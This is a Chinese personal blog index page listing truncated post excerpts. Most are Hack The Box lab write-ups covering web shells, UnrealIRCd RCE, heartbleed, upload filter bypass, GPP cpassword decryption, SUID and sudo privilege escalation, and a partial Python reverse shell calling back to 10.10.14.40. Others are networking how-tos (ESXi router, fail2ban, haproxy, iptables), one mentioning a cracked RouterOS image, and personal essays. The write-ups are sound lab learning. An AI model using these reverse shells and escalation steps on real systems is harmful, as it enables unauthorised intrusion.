Jindom's Blog

Nmap扫出来就开了一个80端口。网站打开发现有一篇讲phpbash的文章，文章中提到这个站点也部署了phpbash。而这个phpbash就是他的名字的意思，一个php文件，可以当做一个远程bash shell用。dirbuster扫出来发现有一个dev耳机目录，试一试phpbash是不是在里面。 直接用python反弹一个shell回去。这时候已经可以读取user.txt了。LinEnum运行一下，发现sudo有点问题。 发现可以以scriptmanager的身份运行sudo而不需要输入密码。sudo -u scriptmanager bash -i运行之后就是scriptmanager的身份了。在根目录发现一个script文件夹，里面有一个test.py和test.txt 直接把test.py内容换成反弹shell的，就可以获得root shell了 import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.10.14.40" ...

nmap初步扫描发现开了22和80，111这三个端口。 访问80提示 IRC is almost working! 感觉似乎有其他的端口，同时web目录扫描也没发现其他有用的页面。 nmap重新扫一下发现存在其他端口 searchsploit unrealirc直接发现一个RCE，可以得到一个低级的shell。 在djmardov这个用户的documents目录下面发现.backup文件   里面有两行话 Super elite steg backup pwUPupDOWNdownLRlrBAbaSSss 然而第二行并不是该用户的ssh密码。 看了论坛才知道，steg是stego隐写的意思。差评，垃圾CTF隐写套路。 下载stegohide之后输入第二行密码解密，得到  Kab6h+m+bbp2J:HG 这个就是ssh密码，ssh登陆上去，就可以cat user.txt了。 之后的提权是通过SUID查的 find / -perm -u=s -type f 2>/dev/null -exec ls -l {} \\; 发现了一个可疑的viewuser程序 ...

首先跑一下nmap扫描 开放了http和https服务，上去看一下。发现存在几个页面，/dev /encode /decode发现dev下面存在两个文件。notes.txt hype_key是一个hex格式的ssh密匙文件，但是加了密，需要另外一个密码口令。 重新跑一遍full nmap scan发现443端口openssl存在heartbleed等一系列漏洞。 下个poc利用一下，发现存在一个很可疑的字符串。 判断应该是base64加密的，解密得到 heartbleedbelievethehype 尝试ssh连上去(用户名不是dev，是hype_key的hype) 跑一下enum脚本，发现正在运行的进程中发现有趣的信息。 发现后台跑着一个tmux，而且是有root权限的。 tmux -S /.devs/dev\_sess

Linux机子，开放了22和80端口 web界面如图，按照信息提示可以推断10.10.10.109/sparklays下面应该存在内容 访问提示forbidden. 用dirbuster扫一下目录. 第一次扫描结果显示存在admin.php和login.php以及一个design目录,暴力猜解密码没有作用，再尝试扫一下design下面的目录.发现存在changelogo.php design.html和一个uploads目录 尝试上传.php和.PHP文件，都不行，可以.php5绕过，然后在uploads目录里面访问这个php 得到一个shell,发现用户dave的目录下面存在3个文件. 尝试ssh上去，发现可以。 同时发现Servers文件里面有俩IP地址，尝试一下这俩ip是不是开放了80或者22这种端口。 结果发现192.168.122.4开放了80和22，192.168.122.5俩都没开放。 这时候端口forward把192.168.122.4的80端口转发给本地访问一下试试. 发现存在一个vpn的configuration界面和dns setting界面 ...

python -c 'import pty;pty.spawn("/bin/bash")' 然后ctrl+z把进程停止了，然后 stty raw -echo 这时候你的输入是看不见的，然后输入fg %进程ID，回车 然后shell就升级完成了，可以使用tab和vim这种。 export TERM=xterm

缘由：为什么想要通过虚拟化一台路由器出来组网呢，很简单，因为没钱。一台配置稍好的企业级路由器价格直接大几千，当然买不起，而通过Esxi虚拟化一台x86的软路由出来不仅性能可以很高，而且零成本。 第一步：安装好Esxi，可以通过把ros的镜像烧到U盘里面来安装Esxi。 烧录工具：rufus-3.4p ROS破解授权镜像(不破解的话ROS只有24小时试用，切记不能更改硬盘大小)：MikroTik RouterOS 6.43.8 没啥好说，插上服务器，BIOS里面BOOT到USB，安装Esxi。 然后推荐在本地创建好ROS的虚拟机然后上载到Esxi。 上载完成之后，配置Esxi里面好相关的网络端口组和虚拟交换机。 配置虚拟交换机的时候记得指定好物理端口，指定的物理端口就是WAN口网线要插的位置。 最好把安全选项卡里面的三个都点成接受。 然后再添加两个端口组，一个LAN和一个WAN，LAN可以直接指定成默认的vSwith交换机，WAN指定成刚刚新创建的，然后VLANID一定要和Management Network指定成一样的，要不然会出现Esxi主机无法连上虚拟的ROS，导致没法远程管 ...

fail2ban可以监视你的系统日志，然后匹配日志的错误信息执行相应的屏蔽动作。网上大部分教程都是关于fail2ban + iptables组合，考虑到CentOS 7已经自带Firewalld，并且使用Firewalld作为网络防火墙更加简单方便，分享下fail2ban + Firewalld使用方法。 检查Firewalld是否启用 #如果您已经安装iptables建议先关闭service iptables stop#查看Firewalld状态firewall-cmd –state#启动firewalldsystemctl start firewalld#设置开机启动systemctl enable firewalld.service 启用Firewalld后会禁止所有端口连接，因此请务必放行常用的端口，以免被阻挡在外，以下是放行SSH端口（22）示例，供参考： #放行22端口firewall-cmd –zone=public –add-port=80/tcp –permanent#重载配置firewall-cmd –reload#查看已放行端口fir ...

寒假回家，家里的移动宽带连接到学校电信骨干网的机房莫名其妙的丢包，连接缓慢，最近正好玩到了的Haproxy可以用来改善解决这个问题。 yum库里直接有haproxy，可以直接 yum -y install haproxy 配置文件在/etc/haproxy/haproxy.cfg global ulimit-n 51200 defaults log global mode tcp option dontlognull timeout connect 5000 timeout client 50000 timeout server 50000 frontend ss-in bind *:23333 default_backend ss-out backend ss-out server ss1 47.244.119.145:23333 maxconn 20480

参考链接： https://www.cnblogs.com/Richardzhu/p/3344676.html https://blog.csdn.net/sj349781478/article/details/78862315 https://www.cnblogs.com/paul8339/p/8042776.html   附上我的配置 [root@node1 ~]# cat /etc/haproxy/haproxy.cfg #---------------------------------------------------------------------# Example configuration for a possible web application. See the# full configuration options online.## http://haproxy.1wt.eu/download/1.4/doc/configuration.txt##-------------------------------------------------- ...

需要的操作系统版本为Ubuntu 16.04 因为安装的时候一些依赖和文件在国内网络环境中皆已被污染和劫持，所以需要全程挂代理。 STEP1：代理环境vim /etc/apt/sources.list 先配置好正确的apt下载源 deb-src http://archive.ubuntu.com/ubuntu xenial main restricted #Added by software-propertiesdeb http://mirrors.aliyun.com/ubuntu/ xenial main restricteddeb-src http://mirrors.aliyun.com/ubuntu/ xenial main restricted multiverse universe #Added by software-propertiesdeb http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricteddeb-src http://mirrors.aliyun.com/ubuntu/ xenial-u ...

从连接数方面针对 iptables -I INPUT -p tcp –dport 80 -m connlimit –connlimit-above 500 -j DROP iptables -I INPUT -p tcp –dport 443 -m connlimit –connlimit-above 500 -j DROP

参考链接：https://ss64.com/nt/runas.html https://forum.hackthebox.eu/discussion/1135/access Detail:这台机子是一台windows，开放了三个端口：21   23   80 首先看一下ftp，发现里面有两个文件。一个加密了的Access Control.zip，zip里面有一个pst文件。还有一个backup.mdb mdb是access数据库的文件，打开把所有的表都过一遍，有了发现。 尝试拿access4u@security这个密码去试一下解压压缩包。 果然是可以的，我们解压得到的Access Control.pst是一个outlook的数据文件，拿outlook打开看一下。 发现里面提供了一个帐号和密码 security4Cc3ssC0ntr0ller 我们尝试用这一套帐号密码去登录23端口的Telnet 登陆成功。 翻一下每个用户的Desktop，发现在security的桌面上有user.txt。 同时发现在Public这个用户的桌面上有一个快捷方式。 发现这个快捷方式用runas.e ...

感谢 @Baikuya 参考链接https://forum.hackthebox.eu/discussion/968/hint-for-waldohttps://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/     逃离restrict bash jailhttps://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/   找到可用的高权限命令https://blog.csdn.net/supermenxxx/article/details/50853778    纠正环境变量 Detail这台机子只开放了80和22端口。 web页面截图如下所示： 里面是一个类似于小留言板一样的应用，可以增删改list。 burpsuit抓包模拟一下流程。 可以看到，这个application尝试去读取list的时候是直接取读取的文件，也就是说这些内容都是文件的形式存储的。 注意到我们发送的请求这里有   path= ...

https://www.hackthebox.eu/home/machines/profile/148 参考链接：https://forum.hackthebox.eu/discussion/944/active-any-hintshttps://github.com/SecureAuthCorp/impackethttps://www.freebuf.com/sectool/175208.htmlhttps://cfdb.io/Windows/Weak\_SPN\_Password NMAP扫描结果 ： active 端口扫描结果来看，开放了很多端口，但是绝大多数都不能直接access。 发现开放了smb协议的端口，看看有没有可以access的share folders。enum4linux扫一哈。 发现存在Replication这么一个共享文件夹是匿名可以访问查看的。 查看了一番，发现里面存在一个包含了关键信息的Groups.xml 里面的cpassword正是用户SVC_TGS的密码。 cpassword可以通过gp3finder工具来解密。gp3finder 得到use ...

https://wp.jinzz.cc/wp-content/uploads/2018/12/Lame.pdf

国内云南大理抚仙湖 云南洱海-双廊-半岛纳海海景客栈 成都四姑娘山 四川理县浮云牧场 吉林长白山天池 国外芬兰罗瓦涅米树屋酒店

参考链接：https://ubuntuforums.org/showthread.php?t=1622931 首先搭建好一台位于公网的pptp/l2tp server 客户端A连接上之后server端出现ppp0 interface 客户端B连接上之后server端出现ppp1 interface 如果没有添加iptables转发规则，二者通信的数据包会被gateway就是server丢弃 server端需要添加 iptables –table nat –append POSTROUTING –out-interface ppp0 –jump MASQUERADEiptables –table nat –append POSTROUTING –out-interface ppp1 –jump MASQUERADE 转发二者之间的数据包。 iptables –table nat –delete POSTROUTING –out-interface ppp0 –jump MASQUERADEiptables –table nat –delete POSTROUTING –ou ...

写这种东西感觉怪中二的，但花很多时间思考过的东西，不记吧太难受，写一下吧还是。 首先其实一切都是从微观和宏观的定义讲起。 宏观世界，就是正常认知到的这个世界，举个很简单的日子，你抛出一个小球，可以肉眼观察到小球的运动轨迹，根据其物理性质，会表现处不同的视觉特性，比如先是在空中划出一道抛物线，落到地上根据自身材质，会弹跳出不同的轨迹。因为我们生活在宏观世界，所以微观世界的很多概念因为我们的生活经验很难去想象和接受。我们出生到死亡，观察世界，得到绝大多数信息的来源都是通过视觉，但是视觉只是很多种sence中的其中一种，蝙蝠和海豚就能通过超声波来观察世界，所以二者观察到的世界是十分不同的。同样的，用观察宏观世界的观测方法来观测微观世界是很困难的，不可行的，我们人类观测微观世界就需要借助一些精密的仪器，通过某种间接的现象来观测解释，而无法直接通过肉眼来观测，自然的，微观世界也较难为我们直观所理解。 起因就是和Samuel讨论，这个世界到底是一切都是确定好了的还是不确定的。我得出的结论是这个世界的一切都是确定好的，因为假设自由意识不存在的情况下，物质的一切变化都是能够通过微观粒子的运动来解释的。 ...

curl -s http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest | grep "CN" | grep "ipv4" | cut -d "|" -f 4,5 >> rawsed -i "s/67108864/6/g" rawsed -i "s/33554432/7/g" rawsed -i "s/16777216/8/g" rawsed -i "s/8388608/9/g" rawsed -i "s/4194304/10/g" rawsed -i "s/2097152/11/g" rawsed -i "s/1048576/12/g" rawsed -i "s/524288/13/g" rawsed -i "s/262144/14/g" rawsed -i " ...

环太平洋这部电影里面有一个设定，叫做通感。因为机甲太过庞大和复杂，单单一个人类驾驶员的大脑精神力不够承受这个负担，所以需要两个驾驶员通过通感，将自己的记忆和另一个人的记忆相融合，形成一种默契和共同感知。 这个设定真的很棒，某种意义上来说，人类都是孤独的，都是不能相互理解的，每个个体都是自私的，都有自己的记忆，动机和理由。通感这个东西，因为是将两个人的记忆相互融合，也就是说，你小时候到现在，经历过的事，所有的记忆和情感，我都能统统感受到，理解到，体验到，同样的，我的秘密，我的人生经历和体会，你也同样都能领会，理解。 而我为什么是我？你为什么是你？如果灵魂，独立意志这些东西不存在，那么唯一可以区分你和我的东西，形成人格品质的东西就只有你和我之间的记忆了。通感打破了你我记忆之间的这一层隔阂，使你变成了我，我又变成了你，你不是你，我不是我，我们都变成了你我。从此你我都不在孤独，真真正正的有了一个懂我，了解我的人，也有一个懂你，了解你的人。哇，真的超级他妈浪漫，还有什么能比这个更浪漫的？ 现在的所有感情，恋爱，婚姻，都是或多或少建立在两性激素，金钱交易上的，同睡一张床，两个心冷冰冰。我想这不是我 ...